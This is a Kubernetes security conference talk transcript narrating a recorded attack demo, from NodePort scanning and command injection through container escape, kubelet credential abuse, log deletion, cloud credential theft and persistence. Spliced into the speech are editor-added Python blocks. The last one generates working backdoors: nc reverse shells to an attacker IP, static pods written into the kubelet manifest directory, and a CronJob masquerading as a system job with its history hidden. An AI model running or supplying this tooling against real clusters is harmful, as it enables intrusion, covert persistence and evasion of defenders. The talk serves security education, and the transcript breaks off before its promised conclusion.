Cool. Welcome everyone. I am definitely a bit nervous, it's a fully packed room. So today we will focus mainly on understanding how we can learn Kubernetes security and cloud native security. Of course, there is a lot of buzz around, at least at the booths, right? A lot of people trying to sell security tools. A bit about me: I'm not from any company, so I'm not selling any tool here. I work as an independent security consultant, primarily around the Kubernetes and cloud native space. My past experience is basically training, teaching and talking to people at a bunch of conferences, like Black Hat, DEF CON, USENIX and some others. Apart from that, I've been trying to give back to the community by contributing some open source projects. One of them we're going to see today is called Kubernetes Goat, which is a fun place to learn Kubernetes security. Apart from that, I keep trying to learn new things, so that's why you see me as a never-ending learner. So feel free to stop by and say so if something I say is wrong; I'm still learning new things. With that, let's quickly look at the agenda, what we're going to do for at least the next 30 minutes or so. We will start by thinking about why exactly we need Kubernetes or cloud native security, because there are a lot of projects going through all this incubation process and graduation and security assessments and stuff, right? But we definitely see it from real world experience; I've been hacking Kubernetes clusters for almost five to six years, since the quite early days of adoption. We will see a road map of how these kinds of hacks map back to real world clusters. And hopefully, that is the one part I'm a bit nervous about: I always used to do live hacking, but because of some constraints I had to record.
So let's see some hacking of all the stages of Kubernetes, from having completely no visibility to cluster takeover, which means the different parts of a hacker's life in Kubernetes, right? We will also see some mappings to real world frameworks, like the OWASP Top 10 and the MITRE ATT&CK framework, if you're someone coming from a security background. And also we will see how you can go back and try learning these things so that you can hack your clusters, basically, to secure them. So pretty much that's it.

So let's start with why exactly we need Kubernetes and cloud native security. I just wanted to start with a bit of a survey, maybe not at a very high level, just a simple form of: raise your hand if that is the thing you are doing. How many of you run, pretty much in production, the bleeding edge, the newest Kubernetes versions? Like maybe 1.26 or 1.25, at least. Ah, quite a lot. Cool. So how many of you are at least running production workloads in Kubernetes? That's amazing. That's awesome, right? To take you back in history, back in 2016 I started learning about Kubernetes, coming completely from a security background, and the way it has changed since then, we will see some of how it evolved. I'm really sorry if anyone here is from a security team; I don't know how many of you are from a security background and doing security work in companies? Okay, sorry, I'm basically going to blame you, but yeah, don't mind. So some of the reasons we wanted to discuss this: one of the biggest challenges we have seen in the security industry is lack of knowledge, because most of Kubernetes and the new concepts are not even understood by security teams, right? How do you protect it if you don't understand the technology? So look at this example.
So a cluster got hacked and you go to the security team: oh, we got hacked by some Monero crypto miner, or whatever crypto mining thing. They say, okay, go ahead and delete the pod or maybe bring up a new node. But if you look at Kubernetes, you can't just go delete a pod or fix a node; that's not how you're going to fix the security issue. So we see this. As I said, I definitely don't want to blame security teams. The biggest gap is that we miss a lot of knowledge about the technology. Unless we understand how the systems work, we definitely can't secure them. That is one of the biggest gaps we have seen.

The second thing is the technology gap. There are a ton of things coming out. If you look at the landscape: how many of you at least know some of the tools out there within the CNCF landscape? It's huge. It's growing. So the landscape is quite heavy and people can't catch up. That's one of the biggest reasons it's very hard to protect, or build security layers on, the Kubernetes or cloud native ecosystem.

Then the biggest thing is maturity. I mean, it's definitely growing in terms of projects and scope and features. But think about security: how is it evolving? What kind of security road map do you see from Kubernetes, or even from the companies and vendors and tools? This is something attackers definitely love: oh, this is how we can leverage this shiny object which is lying in the production workloads.

Another big thing, which I think is not just for security teams: things have migrated all the way close to 1.23. There is a new Kubernetes upstream release every four months saying, oh, we have a new release of 1.25, why don't you migrate?
Because a lot of bugs got patched and you need to move to upstream, right? So people are not able to catch up, at least the security people, and even the development teams. They have to apply it, migrate all these changes and move on to the next thing. And what about the popular hacks? We have seen crypto mining happening all around the world; there are container escapes happening all around the world. By the time you patch all the vulnerabilities from the scanners, you have a ton more vulnerabilities. So there is no time to patch all the vulnerabilities that the security team is saying are in your container images. So these are some of the examples.

One of the biggest reasons is to improve the experience, whether of users, developers or operations teams. If you don't understand the technology, basically you can't secure it. That's what I say: you need to understand it to solve those problems.

So the question is, can we do something about the community's security then? Yes, definitely we can. At least there is a lot of work done by CNCF TAG Security and a bunch of people around the community, which is really awesome. If you look at this, this is one of the threat modeling efforts. I think it applies not just to CNCF or our communities; most companies do threat modeling. This is a very good start to identify what your risk is, what your security posture is and what your critical assets are. It can be data, it can be systems, whatever. So this is just one thing.
There are better approaches you can use to secure things, for example attack trees. Again, this is one of the projects from CNCF TAG Security; they try to show you what kind of layers you can map back to when it comes to security attacks from an attacker's point of view. These are really good if you're someone adopting them and improving them and trying to fix your security issues at different layers, and they also have a bunch of white papers and documentation. But if you go back to security teams in the real world, you need practical experience. These are pretty good on paper. How do you say this is a theoretical vulnerability, but can you really hack it? That's when you have a business case. Okay, you're all saying this is going to be a container escape. Can you say it is really going to happen? Is it happening in the real world? That is what we're going to see today. So we look at whether these are enough to get started with Kubernetes security.

We will look at a very simple high level thing I call an attack path. Some companies call it different variations, like the cyber kill chain or kill chain or whatever. So we will look at a very simple attack kill path. You definitely can't read it, sorry for that. This is the basic kill chain I can think of for Kubernetes. The one thing you have to take away is that there are a lot of possibilities to get into a Kubernetes cluster at various layers of attack. We will go through some of these attacks at different stages: from a completely external facing Kubernetes cluster, to gaining initial access by hacking into the cluster, from there maybe executing in the cluster, maybe in a container or pod, from there how you can laterally move or escalate out of the container to the node, maybe from one node to another node, to complete cluster takeover.
Or, you want to make sure your blue team or security team doesn't detect these attacks, so there are ways to bypass them. We will look at some of them. We will also see how we can laterally move, which can be across the cluster or even beyond the cluster. The whole idea is to make some impact. The impact could be various things: you want to exfiltrate the data of the cluster, or you just want to do crypto mining and make more billing for your compute. There can be any impact, but the kill chain is pretty much similar. You have a lot of paths and a lot of possibilities.

So this all looks good. Let's quickly look at this very simple demo. I really miss doing live hacking, because if I do this live it takes more than 40 minutes, so I had to record it and play it at 2x speed, but I would be super happy to show you outside as well. So let's play. I'll try to navigate through this and explain some of the concepts, what exactly I'm trying to do. We'll start with a completely fresh cluster. Is the font visible at the back? I'm really sorry, I tried to record with a bigger font. If you say something, I can zoom in and play the video.

What we are looking at is a three node Kubernetes cluster. I'm getting the IP addresses of the three worker nodes, okay? These three worker nodes are running a bunch of your production workloads. I'm also taking the master node IP, which is basically your Kubernetes API server. As an attacker, I start with this: I don't know anything about your cluster's workloads; this is the entry point for me. If you look at red teams or attackers, that is what they have to get started with. So let's see what they can do.
I will start with a simple nmap scan. As I said, most of your security knowledge is not going to go to waste because of new technology; the only thing is you need to understand the technology. All of your security skills are still applicable here once you map it back: okay, this is a pod, maybe this is a different thing. So what I'm trying to do here, if you look closely, is a simple nmap scan on the entire range of NodePorts. If you look at the NodePorts of Kubernetes, which are completely exposed to the outside if there is no firewall, basically all of your API gateways, service mesh, all of these firewalls and fancy commercial vendors get bypassed, because it is completely exposed at the node level. We have seen these attacks in a bunch of engagements when I was doing consulting. By the way, most of the attacks you see here come from real world hacks; I try to simulate them and keep them so that you can learn. So if you look, there are a bunch of NodePorts exposed from the cluster. As an attacker: oh, this looks interesting, maybe there is an application. If you start looking, they have a bunch of applications exposed on NodePorts, completely outside of the Kubernetes cluster, and anyone can access them on the internet without a firewall, without API rate limits or a gateway or anything. Okay, as an attacker, I'll just start using the application. Oh, I found it. As a hacker, I just try to see how the application works. It looks like there is a simple functionality, looks like a ping. So maybe I can try giving some system commands. What I'm trying to do here is giving a parameter containing a semicolon followed by id, the semicolon being the command separator, the Linux operator.
This application is vulnerable to an application security attack, remote code execution, right? So I'm trying to chain attacks. I'm using the application security vulnerability to basically do command injection in the container. So now you see: information gathering, I gained knowledge of the systems and I was able to get into the system. I got execution in the pod. Okay, now I'm at the execution stage. I have an RCE. I'm already in your Kubernetes cluster, in one of the pods or containers. That's pretty cool from an attacker's point of view, isn't it? But that's not enough. If you look at red teams or hacking teams, they focus on missions or goals. What is the mission for me? If I just get access to the cluster, maybe that is my goal and I'll stop there. Or maybe my goal is to exfiltrate all your secrets or data. So based on the goal, I want to proceed to the next step.

Once I'm inside a node, or sorry, a pod or container, I want to enumerate more. What can I do from there? The system you see below is the hacker box; think of this as the attacker machine, where I'm trying to get some information and run a bunch of commands. I'm getting the attacker box IP so that I can use it when I'm doing payloads, reverse shells or anything. Rather than keep using the shell through the application, I plant a simple reverse shell so that I get a proper shell back and can do whatever I want from my terminal. So I just did a simple reverse shell: I listen on a port and got the reverse shell back from the container. Now I basically have pod access from my computer.
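[Editor's added example, not part of the talk or of Kubernetes Goat. The ping feature described above is the classic command injection shape: user input pasted into a shell string. The vulnerable pattern is shown beside a hardened handler that allow-lists the target and never goes through a shell. Function names are hypothetical; the demo application itself is not reproduced, and the vulnerable command is returned for inspection rather than executed.]

```python
"""Command injection in a "ping" handler: vulnerable pattern beside a hardened one.
Editor's example (assumed function names); not code from the talk or Kubernetes Goat."""
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 style hostname: labels of alphanumerics and hyphens, dot separated.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def unsafe_ping_command(target: str) -> str:
    """The vulnerable pattern: the request parameter is interpolated into a shell
    command line. Run with shell=True, a target of '127.0.0.1; id' executes
    `id` after ping, which is exactly the RCE shown in the demo. Returned as a
    string here so it can be inspected without being executed."""
    return f"ping -c 1 {target}"


def validate_target(target: str) -> str:
    """Allow-list the input: an IP literal (v4 or v6) or a hostname, nothing else.
    Shell metacharacters, spaces and leading dashes never pass this check."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"rejected ping target: {target!r}")


def safe_ping_argv(target: str) -> List[str]:
    """Hardened form: validated value passed as its own argv element. With
    shell=False there is no shell to interpret ';', '|', '$(...)' and friends."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target: str, timeout: float = 5.0) -> subprocess.CompletedProcess:
    """Execute the hardened command; the only variable element is the validated target."""
    return subprocess.run(safe_ping_argv(target), capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    payload = "127.0.0.1; id"  # constructed attacker input
    print("vulnerable command line:", unsafe_ping_command(payload))
    try:
        safe_ping_argv(payload)
    except ValueError as err:
        print("hardened handler:", err)
    print("hardened argv for a valid target:", safe_ping_argv("10.0.0.1"))
```

The fix is two independent layers: the allow-list rejects anything that is not an address or hostname, and the argv form means that even a validator bug cannot reach a shell. Either alone is weaker than both.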
As an attacker, cool. From there I just want to enumerate more: what more can I do, and what kind of things can I get out of the Kubernetes cluster? So I'll start enumerating. What kind of kernel is it running? What kind of operating system is the container running? If you look at this, I don't even know if it is a container or a VM. So I look at what kind of network interfaces are there. Is it really running in a container or something? I look at cgroups. Okay, it is a Kubernetes pod, which means, pretty cool, I'm inside a Kubernetes container now. From there I see, oh, there are a lot of processes. I don't think a Kubernetes container is supposed to have a lot of processes; a container just needs to have one process. So this looks a bit shady, or interesting, from an attacker's point of view. So I go ahead and look at one of the processes. Oh, this doesn't look like it's running in a container. It looks like a system process. Maybe, and here you definitely need an understanding of Kubernetes and containers, this could be --pid=host, which means you're passing all your host processes to the container. Maybe it is required for some tracing tools or process monitoring tools. These are real world hacks, by the way. We have seen these kinds of attacks when some tools required CAP_SYS_PTRACE, and once you see the processes you can do a process injection attack to even escape the container. Then I also look at what the mount points are. I'm trying to show you various ways you can look at attacks, but you definitely don't see all of these vulnerabilities in one pod; think of these kinds of possibilities in various places. I'm also looking at the DNS resolution and whether we have any extra capabilities.
Looking at it, we got pretty much everything: CAP_SYS_ADMIN, CAP_NET_RAW. So we have pretty much all the access and understanding. As an attacker, I enumerated all the knowledge out of Kubernetes. Then my idea is, can I escape out of the container? If you look here, I'm just using chroot, because there is a file system mounted from the host system. I just escaped. I escaped out of the container to one of the nodes. So I laterally moved, or privilege escalated, from completely outside, nowhere, to a container, and from the container to the node. I'm inside one of your worker nodes. Pretty much think of me as your kubelet. Once I'm your kubelet, what can I do? Because that is not my goal; I want to get cluster admin or do more damage. So I try to see what I can do here. Oh, I see a bunch of images. If I'm someone after data, maybe I'll just see if any pod or Docker container is landing on this node, steal the data and go away. That's my goal of the attack. But if someone wants to take over the complete cluster, maybe they have further goals. So I'll start looking at more. You can also, by the way, do the attack in different ways; I'm just showing another way, using nsenter with the IPC and UTS namespaces.

What I'm trying to do now, because I'm already inside one of the nodes, is: can I leverage something the Kubernetes node already uses? If you think about the Kubernetes architecture, there is something called the kubelet, which is required to talk to the API server. I'm trying to leverage the kubelet configuration to mimic it as an attacker: oh, I'm the kubelet, can you give me something like this? So I use the same kubelet configuration and go and talk to Kubernetes. If you see, kubelet will get pods in the node.
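[Editor's added example, not part of the talk or of Kubernetes Goat. The enumeration steps above (cgroups to confirm a pod, the process list to spot --pid=host, the capability set, and the mount table that revealed the host filesystem used for the chroot escape) are turned into a small triage routine. The sample /proc/self/status, /proc/1/cgroup, ps and /proc/mounts text is constructed so the code runs offline; on a real box read those files and the ps output instead. The "escape capability" list is the editor's judgement, not a standard.]

```python
"""Triage of in-container enumeration output: pod or not, hostPID, dangerous
capabilities, host filesystem mounts. Editor's example over constructed samples."""
from typing import Dict, List, Set

# Linux capability numbers; list index == bit position in CapEff (linux/capability.h).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID",
    "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE",
    "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW",
    "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT",
    "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE",
    "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE",
    "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ",
    "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE",
]
# Capabilities that commonly turn "shell in a pod" into "root on the node" (editor's list).
ESCAPE_CAPS = {"CAP_SYS_ADMIN", "CAP_SYS_PTRACE", "CAP_SYS_MODULE", "CAP_NET_ADMIN",
               "CAP_DAC_READ_SEARCH", "CAP_SYS_RAWIO", "CAP_BPF"}
# Host daemons; seeing them in ps from inside a container is the --pid=host signal.
HOST_DAEMONS = {"kubelet", "containerd", "containerd-shim", "dockerd", "systemd"}
# Files Kubernetes bind-mounts into every pod from the node disk; not an escape path.
K8S_MANAGED_MOUNTS = {"/etc/hosts", "/etc/hostname", "/etc/resolv.conf", "/dev/termination-log"}


def decode_caps(cap_hex: str) -> Set[str]:
    """Turn a CapEff/CapBnd hex mask into capability names."""
    mask = int(cap_hex, 16)
    return {name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1}


def effective_caps(proc_status: str) -> Set[str]:
    for line in proc_status.splitlines():
        if line.startswith("CapEff:"):
            return decode_caps(line.split()[1])
    raise ValueError("no CapEff line in status text")


def is_kubernetes_pod(cgroup_text: str) -> bool:
    """Kubelet places pod containers under a kubepods cgroup slice."""
    return "kubepods" in cgroup_text


def host_pid_suspected(ps_output: str) -> bool:
    """ps -ef output: skip the header, take the CMD column's executable basename."""
    exes = set()
    for line in ps_output.splitlines()[1:]:
        fields = line.split(None, 7)  # UID PID PPID C STIME TTY TIME CMD
        if len(fields) == 8:
            exes.add(fields[7].split()[0].rsplit("/", 1)[-1])
    return bool(exes & HOST_DAEMONS)


def host_filesystem_mounts(mounts_text: str) -> List[str]:
    """Block devices mounted somewhere other than the Kubernetes-managed files:
    a whole node disk exposed in the pod, the chroot target from the talk."""
    found = []
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 3 and fields[0].startswith("/dev/") and fields[1] not in K8S_MANAGED_MOUNTS:
            found.append(fields[1])
    return found


def triage(proc_status: str, cgroup_text: str, ps_output: str, mounts_text: str) -> Dict[str, object]:
    caps = effective_caps(proc_status)
    return {
        "kubernetes_pod": is_kubernetes_pod(cgroup_text),
        "host_pid": host_pid_suspected(ps_output),
        "escape_caps": sorted(caps & ESCAPE_CAPS),
        "host_filesystem_mounts": host_filesystem_mounts(mounts_text),
    }


# Constructed samples resembling what the talk's pod showed.
STATUS_SAMPLE = "Name:\tsh\nUid:\t0\t0\t0\t0\nCapInh:\t0000000000000000\nCapPrm:\t000001ffffffffff\nCapEff:\t000001ffffffffff\nCapBnd:\t000001ffffffffff\n"
CGROUP_SAMPLE = "0::/kubepods/burstable/pod3c1f2e7a-0000-4000-8000-000000000001/cri-containerd-0a1b2c3d\n"
PS_SAMPLE = (
    "UID        PID  PPID  C STIME TTY          TIME CMD\n"
    "root         1     0  0 09:00 ?        00:00:04 /sbin/init\n"
    "root       812     1  0 09:00 ?        00:01:12 /usr/bin/containerd\n"
    "root      1103     1  0 09:00 ?        00:03:31 /usr/bin/kubelet --config=/var/lib/kubelet/config.yaml\n"
    "root      4421  4400  0 09:05 ?        00:00:00 python3 app.py\n"
)
MOUNTS_SAMPLE = (
    "overlay / overlay rw,relatime 0 0\n"
    "proc /proc proc rw,nosuid,nodev,noexec 0 0\n"
    "/dev/sda1 /etc/hosts ext4 rw,relatime 0 0\n"
    "/dev/sda1 /etc/resolv.conf ext4 rw,relatime 0 0\n"
    "/dev/sda1 /host-system ext4 rw,relatime 0 0\n"
    "tmpfs /run/secrets/kubernetes.io/serviceaccount tmpfs ro,relatime 0 0\n"
)

if __name__ == "__main__":
    print(triage(STATUS_SAMPLE, CGROUP_SAMPLE, PS_SAMPLE, MOUNTS_SAMPLE))
```

For comparison, the default container capability set that Docker and containerd grant is CapEff 00000000a80425fb, which still includes CAP_NET_RAW but none of the escape capabilities; a mask of 000001ffffffffff is what a privileged pod shows.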
I'm not getting them, because I don't have the configuration or the credentials of the kubelet. The configuration and credentials are available in kubelet.kubeconfig. So what I have to do is pass this configuration to kubectl; I'm just passing this kubelet configuration and asking the API server, can you give me these pods, can you do this thing? If you look at it, we are able to get the pods, which means whatever permissions the kubelet has, we are able to use as an attacker. Which means you can ask the imperative API, kubectl auth can-i get pods, and it will tell you, using that configuration and the secrets, whether you can or not. Yes, you can get pods. And yes, you can delete pods. It also gives --list, which shows what verbs or objects you can use with the credentials, whether the kubelet can do all of these things. As I said, I've been doing this for years. Initially there was no NodeRestriction admission plugin, which means, using this, I could have deployed another pod on another node and landed on another node, which means I laterally moved from one node to another. Basically, I can completely take over your cluster. But due to that NodeRestriction admission plugin, we are restricted and bound to only one node now. That's definitely a good security fix. But attackers are not going to stop there. They see what could be possible so that they can laterally move to another node.

If you look here, I'm now trying to show defense evasion, which means if you are someone on the blue team or SOC team, the team that wants to detect me, I try to see: can I delete their logs so that they don't detect me? Can I just hide in some way so that they'll never see me lying there? So I'm trying to delete some of the pod logs.
There are a bunch of ways, by the way. Some of them are removing the pod logs or the container logs, because these get forwarded from your Fluentd or Fluent Bit to the SIEM tools like Splunk or the ELK stack, whatever, and your blue team gets an alert triggered. So one of them is that, or you can even change the configurations, because you're already root. You never want to forward certain logs, or something. Basically, you're playing god mode at the node level. Once you are inside here, there are a bunch of defense evasion techniques. This is one of them.

Now that I'm able to escape out of the container, I want to laterally move. Okay, I know that I can get everything in this node, but I want access to another node where there are sensitive workloads. It could be something like your PCI workloads. I'm already inside this node, whose name ends with something like zd, and I want to get access to something like zi, which is a different node in Kubernetes. What I'm looking at now is: can I get the node labels? There is a very native feature of Kubernetes called taints and tolerations, and also node selectors. As an attacker, this is where, again, you need to understand the technology to hack, because I know there is a concept called node selector. As an attacker, I leverage the same feature to go and deploy a pod on another node where I select certain workloads. So what I'm doing is just getting the list of nodes.

Now look at another attack path, which is by the way interesting, and we have seen this in the real world: if you are someone who adopted Kubernetes in the early days, there was no concept of RBAC.
So if someone got into the service account, basically you are god, like cluster admin, which by the way got exploited in the BSides conference CTF: they were trying to run the CTF in a Kubernetes cluster, someone got cluster admin, and basically the entire CTF was over. So what we are trying to do is leverage this service account token, which is basically a JWT at the end. We use this simple JWT; I'm just double checking what kind of things it really has. It's a simple core-app service account, and it has a bunch of privileges. I'm trying to use this service account to see what kind of privileges I have. I'm just exporting some of the values rather than typing them every time: the API server I'm going to talk to, what the service account is, which namespace I'm in, and what the certificate file and the token are, that's it. So I exported all these things and ran a simple curl command to get the namespaces. Can I talk to the API server? Looks like the service account token is working fine. Now, rather than just listing namespaces or getting a pod, I will also go ahead and ask the API server, with these credentials, can I create a simple backdoor pod? If you look at this, I'm creating a pod, and rather than YAML files I'm using JSON because I had to make a curl request to the API server, so I basically converted the YAML into JSON. And one interesting thing you see here is that I'm going to replace the nodeSelector with the node I want to land on as an attacker.
What that helps me do is land on the node I want to take over, rather than landing on the same node I attacked every time. So I'm deploying a backdoor pod which again gives me a reverse shell on another node, the one I want to laterally move to. I put that here, update the node we want to land on, and make the same curl request, because I have all the credentials to talk to the API server and I have pretty much the access to deploy a pod. Once you see this, it's pretty much deployed. It's in pending state and I just want to double check. So I go back, because on the host system I have access, and run kubectl get pods. Yeah, I'm just setting the path. Okay, it's not in the default namespace because the pod is by default in the core-app namespace. You can see the backdoor pod got deployed. That is not that interesting, but we want to know which node it is deployed on. If you do -o wide, you can see it got deployed on the zi node, and basically we gave it host privileges, privileged access. So pretty much you are god on another node, which means you laterally moved to another node and you have root on the host system. So this is pretty much the kill chain you've seen: we started from initial discovery, execution, escape, moving on to different nodes.

There are a bunch of attacks where you can even laterally move without network policies. If there are no network policies, as you already know, you can basically talk to any of the services. This is one of the widely exploited things: people just go and grab internal services because they are not protected with mTLS, or maybe they just think they are namespace bounded or logically segregated. This is very common as well.
Now we will also look at another way. There is a very old concept called static pods in Kubernetes, from before DaemonSets were really in Kubernetes. This used to be helpful for running DaemonSet-like things, which means each node should run one of the node containers, for example logging. So they used to use static pods when there was no DaemonSet. The feature is still there. I think this was recently flagged as well; they're going to deprecate it or something. I'm leveraging this as an attacker: just keep a static pod in the manifests directory. Even if someone tries to delete the pod, it keeps spinning up, because it's not coming from the API server, it's coming from a static pod. The Kubernetes API server is not controlling this; as the attacker, I'm controlling it at the host level. It's a full blown bypass. I believe, I don't remember, don't quote me, these logs might not even be available in the API server if you want to monitor them, which means another way for an attacker to hide. So this is something quite interesting and useful as well. I try to delete it, you can see this, it's popping up again because it's not a normal pod; it's managed as a static pod. So this is again a defense evasion technique, or persistence, if you want to land and stay in the cluster.

There are a bunch of ways you can persist. The good old techniques of adding your SSH key to authorized_keys, or a cron job, or putting a backdoor; there are a ton of techniques if you want to persist in a cluster. But these are not going to work in a distributed system. If you look at it, you just say destroy, and all these backdoors are gone. So how do you keep backdoors in Kubernetes then? I came up with a very interesting approach.
By the way, before I show a cool backdoor, I'm showing another lateral movement approach. Most modern services depend on something called service metadata, like the instance metadata API. They use an IP address, 169.254.169.254, which is reserved for this kind of thing. As an attacker, I can even leverage this kind of metadata. By the way, Shopify got entire clusters hacked due to the same reason. There might be sensitive keys attached, because certain nodes require these API endpoints. As an attacker, I not only laterally move within the cluster, I can even laterally move across your cloud provider. If you think about this, I'm just taking this access key or secret key, or whatever the credential is; in this case I planted them so that you can understand the real world impact. I'm using that to get the caller identity of the profile, just like a hacker would after stealing the tokens. Pretty much you have access to your AWS now, with whatever permissions the credentials have. So you are laterally moving across the cloud; we are impacting not just Kubernetes now. Think about these kinds of attacks at scale. By the way, I'm not saying this is a threat model or could be possible. This is a real world hack I'm showing you live, or not live, sorry, recorded, sorry for that.

So yeah, there are a bunch of attacks you can do. If you think about exfiltration, as I said, that is one way you can steal. But there are attackers behind things like crypto miners. If you look at the previous one, sorry, I think I just moved fast. What I wanted to show in the previous one was how you can basically do resource hijacking if you don't have resource limits and limit ranges, those kinds of things.
As an attacker, if I run a crypto miner, I'm just running a stress tool to show the same thing rather than mining on my own nodes. You see the huge memory usage, a lot of memory getting consumed, like 6MB, and now you see it started getting hit so much. Basically, crypto miners have gotten very smart these days; you can even allocate how many cgroup resources you want so that you don't get detected by your commercial vendors. Some of them got very, very fancy, especially crypto miners. So this is another way you can do it. This is what I wanted to show, sorry for taking too much time.

So this is how you do Kubernetes style backdoors, because those other ones are not persistent; you want to be distributed. I'm leveraging the Kubernetes native feature called CronJob: you spin up a CronJob and make it look like a system job, like Cilium or something, masquerading to avoid defenses, and deploy it in the kube-system namespace, which is where most of the stuff happens. Some interesting things here are concurrency and parallelism; I'll explain them. What I'm doing is setting up the attacker IP; I'm grabbing my attacker box IP. This is the IP I want to get a reverse shell to every time. I create a simple container and run nc to get a shell back. Then I run a listener. Each time I apply this job as a backdoor, you see the pods and you already get the connection back, which means you have a reverse shell from a container all the time. Even if someone deletes the pod, it gets spun up again. It's a very persistent shell. Think about this: even if Kubernetes nodes get deleted, you still have a shell.
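[Editor's added example, not part of the talk or of Kubernetes Goat. It covers the two persistence mechanisms described above: a static pod the kubelet keeps alive from the node's manifest directory, and a CronJob that re-creates a reverse shell pod on a schedule and so survives pod deletion, node replacement and cluster upgrades. Manifests are emitted as JSON, which both the kubelet's file source and the API server accept. The manifest directory default, the attacker address, the names and the kubelet config text are placeholders; nothing is applied to a cluster. A small defender-side check that walks any of these manifests for outbound shell commands is included; it is an editor's heuristic, not a product rule.]

```python
"""Static pod and CronJob persistence manifests, plus a reverse-shell heuristic.
Editor's example with placeholder values; not code from the talk or Kubernetes Goat."""
import json
import os
from typing import Any, Dict

DEFAULT_STATIC_POD_PATH = "/etc/kubernetes/manifests"  # kubeadm default; assumption
SHELL_MARKERS = ("nc ", "ncat ", "/dev/tcp/", "bash -i", "socat ")


def shell_container(name: str, attacker_ip: str, port: int) -> Dict[str, Any]:
    """The nc reverse shell from the demo; busybox nc in alpine supports -e."""
    return {"name": name, "image": "alpine",
            "command": ["/bin/sh", "-c", f"nc {attacker_ip} {port} -e /bin/sh"]}


def static_pod_path(kubelet_config_yaml: str) -> str:
    """Find staticPodPath in the kubelet config (root-only read on the node),
    falling back to the kubeadm default. Line-level parse, no YAML library."""
    for line in kubelet_config_yaml.splitlines():
        key, _, value = line.strip().partition(":")
        if key == "staticPodPath" and value.strip():
            return value.strip().strip('"')
    return DEFAULT_STATIC_POD_PATH


def static_pod_manifest(name: str, attacker_ip: str, port: int) -> Dict[str, Any]:
    """Static pod: the kubelet reads it from disk and recreates it whenever the
    mirror pod is deleted through the API; the API server never owns it."""
    return {"apiVersion": "v1", "kind": "Pod",
            "metadata": {"name": name, "namespace": "kube-system"},
            "spec": {"restartPolicy": "Always", "hostNetwork": True,
                     "containers": [shell_container(name, attacker_ip, port)]}}


def static_pod_file_contents(manifest: Dict[str, Any]) -> str:
    return json.dumps(manifest, indent=2)


def write_static_pod(manifest: Dict[str, Any], directory: str) -> str:
    """Drop the manifest where the kubelet watches; returns the written path."""
    path = os.path.join(directory, manifest["metadata"]["name"] + ".json")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(static_pod_file_contents(manifest))
    return path


def cronjob_backdoor(name: str, attacker_ip: str, port: int,
                     schedule: str = "*/1 * * * *", namespace: str = "kube-system") -> Dict[str, Any]:
    """CronJob persistence: the object lives in etcd, not on a node. concurrencyPolicy
    Allow keeps launching a fresh shell even while the previous one is still connected;
    zero history limits and restartPolicy Never leave fewer finished pods to notice."""
    return {"apiVersion": "batch/v1", "kind": "CronJob",
            "metadata": {"name": name, "namespace": namespace},
            "spec": {"schedule": schedule, "concurrencyPolicy": "Allow",
                     "successfulJobsHistoryLimit": 0, "failedJobsHistoryLimit": 0,
                     "jobTemplate": {"spec": {"parallelism": 1, "backoffLimit": 0,
                                              "template": {"spec": {
                                                  "restartPolicy": "Never",
                                                  "containers": [shell_container(name, attacker_ip, port)]}}}}}}


def pod_spec(manifest: Dict[str, Any]) -> Dict[str, Any]:
    """Descend to the pod spec inside a Pod, Job, CronJob, Deployment or DaemonSet."""
    spec = manifest["spec"]
    if manifest["kind"] == "CronJob":
        return spec["jobTemplate"]["spec"]["template"]["spec"]
    if manifest["kind"] in ("Job", "Deployment", "DaemonSet", "StatefulSet"):
        return spec["template"]["spec"]
    return spec


def looks_like_reverse_shell(manifest: Dict[str, Any]) -> bool:
    """Defender-side heuristic over any manifest, including static pod files."""
    for container in pod_spec(manifest).get("containers", []):
        cmd = " ".join(container.get("command", []) + container.get("args", []))
        if any(marker in cmd for marker in SHELL_MARKERS):
            return True
    return False


if __name__ == "__main__":
    cfg = "kind: KubeletConfiguration\nstaticPodPath: /etc/kubernetes/manifests\n"  # constructed
    print("static pods read from:", static_pod_path(cfg))
    print(static_pod_file_contents(static_pod_manifest("kube-proxy-helper", "10.0.0.5", 4444)))
    cj = cronjob_backdoor("cilium-gc", "10.0.0.5", 4444)
    print("cronjob flagged:", looks_like_reverse_shell(cj))
```

Both manifests end up visible somewhere a defender can look: a static pod appears as a mirror pod in the API (read-only, which is itself the tell), and a CronJob is an ordinary namespaced object, so an audit log entry for its creation and a periodic review of CronJobs in kube-system catch it. Tetragon or Falco rules on outbound connections from a container's first process catch the shell itself regardless of which manifest launched it.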
